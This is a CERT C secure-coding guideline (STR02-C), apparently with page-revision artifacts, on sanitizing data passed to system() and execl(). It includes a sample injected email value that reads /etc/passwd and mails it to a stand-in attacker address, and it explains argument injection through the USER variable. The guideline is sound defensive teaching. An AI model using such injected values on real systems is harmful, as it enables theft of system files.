String data passed to complex subsystems may contain special characters that can trigger commands or actions, resulting in a software vulnerability. As a result, it is necessary to sanitize all string data passed to complex subsystems so that the resulting string is innocuous in the context in which it will be interpreted.
These are some examples of complex subsystems:
- command Command processor via a call to
system()
or similar function (also addressed in ENV03-C. Sanitize the environment when invoking external programs) - external External programs
- relational Relational databases
- thirdThird-party commercial off-the-shelf components (for example, an enterprise resource planning subsystem)
...
Code Block | ||||
---|---|---|---|---|
| ||||
sprintf(buffer, "/bin/mail %s < /tmp/email", addr); system(buffer); |
The risk is, of course, is that the user enters the following string as an email address:
Code Block |
---|
bogus@addr.com; cat /etc/passwd | mail some@badguy.net |
For more info information on the system()
call, see ENV03-C. Sanitize the environment when invoking external programs and ENV04ENV33-C. Do not call system() if you do not need a command processor.
Compliant Solution
It is necessary to ensure that all valid data is accepted, while potentially dangerous data is rejected or sanitized. Doing so can be difficult when valid characters or sequences of characters also have special meaning to the subsystem and may involve validating the data against a grammar. In cases where there is no overlap, whitelisting can be used to eliminate dangerous characters from the data.
The whitelisting approach to data sanitization is to define a list of acceptable characters and remove any character that is not acceptable. The list of valid input values is typically a predictable, well-defined set of manageable size. This examplecompliant solution, based on the tcp_wrappers
package written by Wietse Venema, shows the whitelisting approach.:
Code Block | ||||
---|---|---|---|---|
| ||||
static char ok_chars[] = "abcdefghijklmnopqrstuvwxyz" "ABCDEFGHIJKLMNOPQRSTUVWXYZ" "1234567890_-.@"; char user_data[] = "Bad char 1:} Bad char 2:{"; char *cp = user_data; /* cursorCursor into string */ const char *end = user_data + strlen( user_data); for (cp += strspn(cp, ok_chars); cp != end; cp += strspn(cp, ok_chars)) { *cp = '_'; } |
...
The vulnerability in in.telnetd
invokes the login
program by calling execl()
. This call passes unsanitized data from an untrusted source (the USER
environment variable) as an argument to the login
program.:
Code Block | ||||
---|---|---|---|---|
| ||||
(void) execl(LOGIN_PROGRAM, "login", "-p", "-d", slavename, "-h", host, "-s", pam_svc_name, (AuthenticatingUser != NULL ? AuthenticatingUser : getenv("USER")), 0); |
An attacker, in this case, can gain unauthenticated access to a system by setting the USER
environment variable to a string, which is interpreted as an additional command-line option by the login
program. This kind of attack is called argument injection.
Compliant Solution
The following This compliant solution inserts the "--"
(double dash) argument before the call to getenv("USER")
in the call to execl()
:
...
Because the login
program uses the POSIX getopt()
function to parse command-line arguments, and because the "--"
(double dash) option causes getopt()
to stop interpreting options in the argument list, the USER
variable cannot be used by an attacker to inject an additional command-line option. This is a valid means of sanitizing the untrusted user data in this context because the behavior of the interpretation of the resulting string is rendered innocuous.
The call to execl()
is not susceptible to command injection because the shell command interpreter is not invoked. (See ENV04ENV33-C. Do not call system() if you do not need a command processor.)
Risk Assessment
Failure to sanitize data passed to a complex subsystem can lead to an injection attack, data integrity issues, and a loss of sensitive data.
Recommendation | Severity | Likelihood | Remediation Cost | Priority | Level |
---|---|---|---|---|---|
STR02-C |
High |
Likely |
Medium | P18 | L1 |
Automated Detection
Tool | Version | Checker | Description | ||||||
---|---|---|---|---|---|---|---|---|---|
Astrée |
| Supported by stubbing/taint analysis | |||||||
CodeSonar |
| IO.INJ.COMMAND | Command injection | ||||||
Coverity | 6.5 | TAINTED_STRING | Fully |
Fortify SCA
5.0
implemented | ||||||||
Klocwork |
| NNTS.TAINTED |
LDRA tool suite |
| 108 D, 109 D | Partially implemented | ||||||
Parasoft C/C++test |
| CERT_C-STR02-a | Protect against command injection | ||||||
Polyspace Bug Finder |
| Checks for:
Rec. partially covered. |
Related Vulnerabilities
Search for for vulnerabilities resulting from the violation of this rule on the CERT website.
Related Guidelines
SEI CERT C++ |
Coding Standard | VOID STR02-CPP. Sanitize data passed to complex subsystems |
CERT Oracle Secure Coding Standard for Java | IDS00-J. |
Prevent SQL injection | |
MITRE CWE | CWE-88, Argument injection or modification CWE-78, Failure to sanitize data into an OS command (aka "OS command injection") |
Bibliography
...
...